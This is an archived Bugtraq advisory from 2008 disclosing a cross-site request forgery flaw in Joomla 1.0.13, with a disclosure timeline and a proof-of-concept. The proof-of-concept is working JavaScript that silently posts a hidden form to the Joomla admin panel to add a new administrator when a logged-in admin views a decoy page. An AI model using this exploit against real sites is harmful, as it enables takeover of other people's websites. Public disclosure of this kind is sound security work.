Joomla 1.0.13 CSRF

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Joomla 1.0.13 CSRF
From: "J. Carlos Nieto" <xiam@xxxxxxxxxxxxxxxx>
Date: Tue, 08 Jan 2008 12:07:49 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Thunderbird 2.0.0.6 (X11/20070728)

Author: Jose Carlos Nieto.

Date: Jan 08, 2008

Severity: Mild

There exists a Cross Site Scripting security hole in Joomla 1.0.13.


Background
==========

*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source 
<http://en.wikipedia.org/wiki/Open_source_software> content management system 
<http://en.wikipedia.org/wiki/Content_management_system> for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets 
<http://en.wikipedia.org/wiki/Intranet>.
Joomla! is licensed under the GPL 
<http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork 
<http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo 
<http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.


Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a 
specially
crafted webpage.


Summary
=======
Joomla! has no CSRF protection. A malicious user can trick an administrator 
into viewing
a specially crafted webpage containing an exploit, this exploit can execute 
(without permission)
any command the administrator would normally execute, such as publish a content 
or even add a new
administrator.


Solution
========
This problem has no solution at this time.


Disclosure timeline
===================
Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.


Proof of Concept
================

If a logged in administrator visits this page a new administrator will be added 
to the victim's
Joomla powered website.

---- exploit code ----

<script type="text/javascript">

window.onload = function() {

   var url = "http://joomlasite.com/joomla/administrator/index2.php";;


   var gid = 25;

   var user = 'custom_username';

   var pass = 'custom_password';

   var email = 'joe_cool@xxxxxxxxxxx';

   var param = {

       name: user,

       username: user,

       email: email,

       password: pass,

       password2: pass,

       gid: gid,

       block: 0,

       option: 'com_users',

       task: 'save',

       sendEmail: 1

   };


   var form = document.createElement('form');

   form.action = url;

   form.method = 'post';

   form.target = 'hidden';

   form.style.display = 'none';


   for (var i in param) {

       try {

           // ie

           var input = document.createElement('<input name="'+i+'">');

       } catch(e) {

           // other browsers

           var input = document.createElement('input');

           input.name = i;

       }

       input.setAttribute('value',  param[i]);

       form.appendChild(input);

   }

   document.body.appendChild(form);


   form.submit();

}

</script>


<iframe name="hidden" style="display: none"></iframe>


<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg";>

---- exploit code ----

Follow-Ups:
- Re: Joomla 1.0.13 CSRF
  - From: J. Carlos Nieto

Prev by Date: Level-One WBR-3460A Grants Root Access
Next by Date: Re: Joomla 1.0.13 CSRF
Previous by thread: Level-One WBR-3460A Grants Root Access
Next by thread: Re: Joomla 1.0.13 CSRF
Index(es):
- Date
- Thread